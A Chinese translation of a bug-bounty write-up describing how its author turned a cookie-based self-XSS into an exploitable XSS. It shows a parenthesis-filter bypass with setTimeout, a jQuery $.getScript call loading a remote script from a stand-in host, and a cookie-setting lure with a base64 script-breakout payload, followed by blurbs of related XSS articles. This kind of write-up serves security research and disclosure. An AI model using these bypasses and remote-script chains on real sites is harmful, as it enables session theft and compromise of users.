从Self-XSS到可利用的xss

最新推荐文章于 2024-09-13 14:09:24 发布
最新推荐文章于 2024-09-13 14:09:24 发布
阅读量3.6w 收藏 9
点赞数 3
分类专栏: 外文翻译

翻译自:https://medium.com/@0xHyde/cookie-based-self-xss-to-good-xss-d0d1ca16dd0e
翻译:聂心明

上个月我收到来自Synack团队的私有赏金任务,最后我在网站中发现了一个反射型xss。因为这是私有赏金任务,我不能在writeup中提到目标的信息。但是我会演示我是怎样绕过各种限制的。我最后得到了$272,因为我没有证明我能访问dom对象。因为网站限制了圆括号,所以我不能访问到dom,并且我不能执行像下面这样的payload:

alert(document.domain)

正常情况下,上面的JavaScript代码执行后会有下面截图中的效果

alert`document.domain`

因为圆括号被过滤,我就用`字符来执行我的函数。不幸的是,当下面的函数被执行的时候,你不会访问dom资源。下面的截图是一个简单的例子。

我提交了这个报告,并且获得了$272,可是如果我告诉他们我能实现dom的访问,我就能额外获得一份赏金,所以很自然我开始了这一项挑战。我跟Brutelogic (Brute)说了这件事,然后向他咨询了一些绕过技术,然后他告诉我可以参考他的xss备忘录。当我学习他的文档时,我发现下面的这段payload:

setTimeout`alert\x28document.domain\x29`

这个payload能够实现我需要的效果,就是随意访问dom。我重新提交了新的payload,这个payload展示了我可以随意访问网页的dom资源,然后我获得了额外的60块钱。但是我没有就此停手。早些时候,我在漏洞收取范围内的子域名下发现一个Self-XSS。cookie中有一个被base64编码了的参数,这个参数可导致xss。典型的基于cookie的xss,但是它没法被利用,除非攻击者能给客户浏览器设置cookie。幸运的是,我现在手上有一个xss了,就是我上面提到的。可是我的payload不能太长,否则就会失败。我知道,如果我想执行一些有攻击力的payload的话,那我必须嵌入外部的JavaScript文件,因为即使是最简单的payload都会因为太长而不会执行成功。我也似乎不能嵌入包含payload的外部JavaScript文件,以用来设置cookie的属性。因为它还是太长了。但是,我注意漏洞页面用了jQuery,这就可以让我用一些足够短的语句来嵌入脚本文件。下面是我用到的代码:

$.getScript`//xss.example.com/xss.js`

现在,我只需要用JavaScript代码把payload base64编码,然后放入cookie中的那个有漏洞的参数中就可以了。下面就是我用到的代码:

$('html').html('<h1>Click the button below to continue.</h1><input type="submit" value="Click Me" onclick=setCookieRedir() />');
function setCookieRedir(){
        document.cookie = "vulnerableCookie=LS0+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOy8v;path=/;domain=.example.com;";
	window.location = "https://example.com/vulnerablePage.html";
}

上面的代码会把网页的上半部分文本替换成”点击下面这个按钮就可以继续“,下面会带有一个按钮。当受害者点击这个按钮时,js代码就会设置那个有漏洞的cookie参数为下面的字符串

LS0+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOy8v

上面的字符串经过base64解码之后就是下面的代码,它就会在有漏洞的页面上弹窗

--></script><script>alert(document.domain);//

最后,我想这是一个非常有趣的漏洞利用过程,当我不断的尝试绕过时,我也感受到了非常多的乐趣。最后,我因为把Self-XSS变成了可利用的xss,我获得了$616,此外,我还因为上文提到的漏洞利用链获得了$272 + $60的赏金。

niexinming
关注
专栏目录
全面掌握XSS漏洞攻击,实战案例从Self-XSS到账户接管,以及通过参数污染的XSS实现攻击
代码讲故事
12-19 1285
全面掌握XSS漏洞攻击,实战案例从Self-XSS到账户接管。 什么是跨站脚本攻击 (XSS)? 跨站脚本攻击(XSS)是一种网络安全漏洞,允许攻击者破坏用户与易受攻击的应用程序之间的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网站隔离开来。XSS漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户能够访问的任何数据。 XSS是如何工作的? 跨站脚本攻击通过操纵易受攻击的网站使其向用户返回恶意JavaScript来工作。当恶意代码在受害者的浏览器中执行时,攻击者可以完全破坏网站。
CSRF +self xss的运用【DVWA测试】
Miracle_ze的博客
08-17 500
当我我们发现传输中有一个CSRF的漏洞,传输没有带上token值。我们就可以两者利用,使用CSRF来构造一个form表单,在form表单中写上selfxss的地址【存储型xss,把地址存入数据库】。当他人点击CSRF给的链接的适合就会执行一次selfxss命令并且获取到cookie。短链接是可以隐藏网站真正目的,比如把修改密码网站改为短链接就看不出来了。selfxss,顾名思义,自己输入xss脚本,输出仅自己看到,仅xss到自己。因为登录的是自己的用户使用这个命令就将只获取自己的cookie值。...
XSS漏洞的利用
LizePing_的博客
07-29 5167
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS 漏洞检测与利用全解析:守护网络安全的关键洞察
最新发布
bigbangbangbang1的博客
09-13 1087
XSS 漏洞是一种常见的网络安全漏洞,它可以让攻击者在受害者的浏览器中执行恶意脚本,从而窃取用户的敏感信息、篡改页面内容或者进行其他恶意操作。为了检测和防范 XSS 漏洞,我们可以使用手动检测和自动化检测工具,同时采取输入验证和过滤、输出编码、设置 HttpOnly 标志、使用内容安全策略等防范措施。通过这些方法,可以有效地提高网页的安全性,保护用户的敏感信息。
XSS详解及其利用方式
读书 买花 长大
11-14 4011
XSS-xss
XSS利用
YIN_XIAOMAO的博客
05-29 335
XSS利用方式较多,多研究总有一个适合你,XSS防御方式较多,多种方式联动防御才好。
XSS总结
weixin_51356351的博客
11-19 1609
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
为了展示如何将Self-XSS利用起来,本文将介绍一个具体的例子。下面的代码片段展示了如何创建一个可以触发Self-XSS的页面,并且通过一定的技术手段使得恶意脚本在视觉上变得不可见,从而提高攻击的成功率。 ```html ...
挖洞经验 | self-xss的进化之路
weixin_40418457的博客
05-04 2687
本文涉及漏洞点: 1、self-xss 2、scheme 跳转 3、URL 跳转 4、CSRF 5、JSONP 挖掘过程分解: 一、挖掘背景介绍 在某次冲浪过程中,随手测试了一下这个系统的预览功能,点击预览会生成二维码,需要手机QQ扫描才能访问预览界面。 随手点击F12修改HTML源码,插入XSS代码 再次扫描二维码预览,触发XSS。 原本以为这就结束了,直到换了一个账户,扫描之后才发现进坑了,这是一个self-xss,无奈洞是自己挖的,无论如何也要利用起来。 二、self-xss的上位之路 1.首
SRC漏洞挖掘 存储的self-xss变有效xss(两个iframe实现)
beishanxueyuan的博客
06-28 765
src漏洞挖掘思路教学 存储的self-xss变有效xss(两个iframe实现)
CSRF+Self XSS
newlife1441的博客
08-16 617
CSRF,跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。。防御原理:由于服务端没有对客户端进行身份校验,所以我们可以通过添加令牌token、验证码等方法来防御csrf;CSRF 利用的是网站对用户浏览器的信任。Self XSS,自己输入xss脚本,输出仅自己看到,仅xss。............
pwnhub_WTP攻击思路--self-xss高级利用
weixin_30922589的博客
07-01 483
1、self-xss+302跳转构造csrf的利用: 1、login.php 存在跳转2、http://54.223.108.205:23333/login.php?redirecturl=//vps/c.html 通过302跳转构造csrf提交到reportbug页面让管理员提交一篇有xss的文章c.html是<img src=1 onerror=document.locati...
XSS利用方式
u011215939的博客
01-16 9041
前言 学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下…… 准备 为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS
【网络安全】XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1532
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
XSS漏洞利用方式总结
XunanSec的博客
05-21 4947
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
xss原理及利用
MAPLE102424的博客
05-12 1422
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。当别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
XSS利用之一看就懂
qq_42743187的博客
01-31 467
xss利用方法之前,先分享一个前几天友情测试的案例吧 一、XSS案例 站点就不说了,图片打码,主要看效果就可以了???? 页面上有个搜索框,输入随机值在标签中输出,不允许输入尖括号,页面会直接显示错误,但双引号可以使用 " οnclick="alert(1),直接测试,查看页面源代码发现一个问题: 就是我输入的英文小括号,输出时变成了中文括号,这样alert()函数就执行不了了。。。 于是想到,用反引号来代替小括号试试,成功弹窗,源代码显示如下: 但是这里又存在一个问题,反引号里的内容会被当成字符串处
05. XSS漏洞利用
weixin_43909650的博客
12-17 936
2022网安冬令营(web安全/渗透测试/实战训练)——蚁景网安 https://ke.qq.com/course/5874132#term_id=106089914
XSS完整利用过程
weixin_39811856的博客
05-19 677
XSS,wiki的解释是一种代码注入,所以能做的事情很多,不限于alert弹框(感觉很多人以为XSS就是弹框框,弹不出来就不认)、窃取Cookie之类的操作,下面要实现的水坑攻击就是一种利用。 过程: 1.利用JS写一个诱导页面,不要再用flash更新页面了,都被人家玩剩很多年了... 我写了个页面,抛砖引玉,一个是模仿chrome浏览器崩溃后的页面,另一个是使用layer的弹窗页面。 代码一,chrome浏览器崩溃页面: var body = document.body; var _
tomcat如何调高-Xss
07-02
Tomcat 是一个开源的 Java Servlet 和 JSP 容器,用于运行 Java Web 应用程序。默认情况下,它提供了基本的安全保护措施,包括对跨站脚本攻击 (XSS) 的防护。如果需要进一步提高 XSS 防护,你可以调整一些配置参数来增强安全性。以下是一些方法: 1. **`<%@ page encoding="UTF-8" %>`**: 在 JSP 文件的顶部添加此声明,确保页面编码为 UTF-8,这样可以防止一些字符转义问题。 2. **`<c:output htmlEscape="true">`**: 使用 JSTL `<c:output>` 标签的 `htmlEscape` 属性,使所有输出到 HTML 的文本都被转义,以避免恶意脚本注入。 3. **`.htaccess` 文件**:在 Tomcat 的部署目录下创建一个 `.htaccess` 文件,使用 `Header set Content-Security-Policy "default-src 'self'` 来限制内容来源。 4. **XML 格式配置**:在 `server.xml` 中的 `<Connector>` 标签内,可以设置 `xpoweredBy="false"` 隐藏服务器版本信息,减少被攻击利用的机会。 5. **`org.apache.tomcat.util.http.ServerCookie` 类**:在处理 Cookie 时,使用这个类的 `setHttpOnly(true)` 方法,使 Cookie 只能通过 HTTP 协议访问,防止 JavaScript 访问。 6. **启用 CSP(Content Security Policy)**:在 web.xml 或 deployment descriptor 中启用 CSP,定义一个严格的策略来限制资源加载。 7. **升级依赖**:保持第三方库的版本更新,有些库可能已针对 XSS 攻击发布了安全补丁。 尽管以上步骤可以帮助提高防护,但最好的做法还是结合前端验证和后端逻辑检查,形成多层次的安全防护体系。如果你具体遇到了某个问题,或者想要了解如何根据最新的 Tomcat 版本进行配置,请提供更多信息,以便我能给出更精确的建议。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值